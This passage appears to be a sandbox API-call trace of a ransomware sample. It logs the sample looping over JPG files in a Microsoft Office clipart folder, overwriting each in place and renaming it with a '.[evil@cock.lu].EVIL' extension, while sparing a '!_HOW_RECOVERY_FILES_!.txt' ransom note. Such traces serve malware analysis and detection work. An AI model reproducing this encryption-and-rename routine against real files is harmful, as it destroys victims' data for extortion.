_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.944] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0175428.JPG") returned 0x0 [0147.944] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 0x45 [0147.944] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.946] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x38d8, lpOverlapped=0x0) returned 1 [0147.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.954] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.954] _errno () returned 0x84b1160840 [0147.954] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.954] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38e0, lpOverlapped=0x0) returned 1 [0147.956] CloseHandle (hObject=0x1a8) returned 1 [0147.956] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.956] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.956] __uncaught_exception () returned 0x84b1160800 [0147.956] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.956] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg.[evil@cock.lu].evil")) returned 1 [0147.957] ??_V@YAXPEAX@Z () returned 0x1 [0147.960] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG", dwFileAttributes=0x200) returned 0 [0147.960] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.960] wcsstr (_Str="J0177257.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.960] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 69 [0147.960] wcscmp (_String1="J0177257.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.960] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0177257.JPG") returned 0x0 [0147.960] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG") returned 0x45 [0147.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.962] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb12e, lpOverlapped=0x0) returned 1 [0148.004] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.004] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.004] _errno () returned 0x84b1160840 [0148.005] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.005] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xb140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb140, lpOverlapped=0x0) returned 1 [0148.005] CloseHandle (hObject=0x1a8) returned 1 [0148.005] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.005] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.005] __uncaught_exception () returned 0x84b1160800 [0148.005] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.006] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177257.jpg.[evil@cock.lu].evil")) returned 1 [0148.007] ??_V@YAXPEAX@Z () returned 0x1 [0148.010] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177257.JPG", dwFileAttributes=0x200) returned 0 [0148.010] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.010] wcsstr (_Str="J0177806.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.010] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 69 [0148.010] wcscmp (_String1="J0177806.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.010] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0177806.JPG") returned 0x0 [0148.010] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG") returned 0x45 [0148.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.013] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd902, lpOverlapped=0x0) returned 1 [0148.036] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.036] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.036] _errno () returned 0x84b1160840 [0148.036] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xd920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd920, lpOverlapped=0x0) returned 1 [0148.037] CloseHandle (hObject=0x1a8) returned 1 [0148.037] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.037] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.037] __uncaught_exception () returned 0x84b1160800 [0148.037] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0177806.jpg.[evil@cock.lu].evil")) returned 1 [0148.038] ??_V@YAXPEAX@Z () returned 0x1 [0148.042] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0177806.JPG", dwFileAttributes=0x200) returned 0 [0148.042] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.042] wcsstr (_Str="J0178348.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 69 [0148.042] wcscmp (_String1="J0178348.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178348.JPG") returned 0x0 [0148.042] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG") returned 0x45 [0148.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.044] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x907d, lpOverlapped=0x0) returned 1 [0148.071] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.071] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.071] _errno () returned 0x84b1160840 [0148.071] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x9080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9080, lpOverlapped=0x0) returned 1 [0148.072] CloseHandle (hObject=0x1a8) returned 1 [0148.072] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.073] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.073] __uncaught_exception () returned 0x84b1160800 [0148.073] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.073] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178348.jpg.[evil@cock.lu].evil")) returned 1 [0148.075] ??_V@YAXPEAX@Z () returned 0x1 [0148.079] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178348.JPG", dwFileAttributes=0x200) returned 0 [0148.079] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.079] wcsstr (_Str="J0178459.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.079] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 69 [0148.079] wcscmp (_String1="J0178459.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.079] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178459.JPG") returned 0x0 [0148.079] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG") returned 0x45 [0148.079] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.082] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7214, lpOverlapped=0x0) returned 1 [0148.103] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.103] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.103] _errno () returned 0x84b1160840 [0148.103] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.103] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7220, lpOverlapped=0x0) returned 1 [0148.103] CloseHandle (hObject=0x1a8) returned 1 [0148.104] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.104] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.104] __uncaught_exception () returned 0x84b1160800 [0148.104] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.104] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178459.jpg.[evil@cock.lu].evil")) returned 1 [0148.105] ??_V@YAXPEAX@Z () returned 0x1 [0148.108] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178459.JPG", dwFileAttributes=0x200) returned 0 [0148.108] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.108] wcsstr (_Str="J0178460.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.108] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 69 [0148.108] wcscmp (_String1="J0178460.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.108] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178460.JPG") returned 0x0 [0148.108] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG") returned 0x45 [0148.108] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.110] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x67a3, lpOverlapped=0x0) returned 1 [0148.118] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.118] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.118] _errno () returned 0x84b1160840 [0148.119] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.119] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x67c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x67c0, lpOverlapped=0x0) returned 1 [0148.119] CloseHandle (hObject=0x1a8) returned 1 [0148.119] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.119] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.119] __uncaught_exception () returned 0x84b1160800 [0148.119] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.120] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178460.jpg.[evil@cock.lu].evil")) returned 1 [0148.121] ??_V@YAXPEAX@Z () returned 0x1 [0148.124] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178460.JPG", dwFileAttributes=0x200) returned 0 [0148.124] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.124] wcsstr (_Str="J0178523.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.124] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 69 [0148.124] wcscmp (_String1="J0178523.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.124] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178523.JPG") returned 0x0 [0148.124] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG") returned 0x45 [0148.125] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.127] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5de2, lpOverlapped=0x0) returned 1 [0148.135] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.135] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.135] _errno () returned 0x84b1160840 [0148.135] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.136] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5e00, lpOverlapped=0x0) returned 1 [0148.136] CloseHandle (hObject=0x1a8) returned 1 [0148.136] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.136] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.136] __uncaught_exception () returned 0x84b1160800 [0148.136] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.137] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178523.jpg.[evil@cock.lu].evil")) returned 1 [0148.137] ??_V@YAXPEAX@Z () returned 0x1 [0148.141] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178523.JPG", dwFileAttributes=0x200) returned 0 [0148.141] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.141] wcsstr (_Str="J0178632.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.141] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 69 [0148.141] wcscmp (_String1="J0178632.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.141] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178632.JPG") returned 0x0 [0148.141] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG") returned 0x45 [0148.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.144] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b2a, lpOverlapped=0x0) returned 1 [0148.152] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.152] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.152] _errno () returned 0x84b1160840 [0148.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5b40, lpOverlapped=0x0) returned 1 [0148.153] CloseHandle (hObject=0x1a8) returned 1 [0148.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.153] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.153] __uncaught_exception () returned 0x84b1160800 [0148.153] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178632.jpg.[evil@cock.lu].evil")) returned 1 [0148.154] ??_V@YAXPEAX@Z () returned 0x1 [0148.158] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178632.JPG", dwFileAttributes=0x200) returned 0 [0148.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.158] wcsstr (_Str="J0178639.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.158] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 69 [0148.158] wcscmp (_String1="J0178639.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.158] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178639.JPG") returned 0x0 [0148.158] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG") returned 0x45 [0148.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0xc0000000, 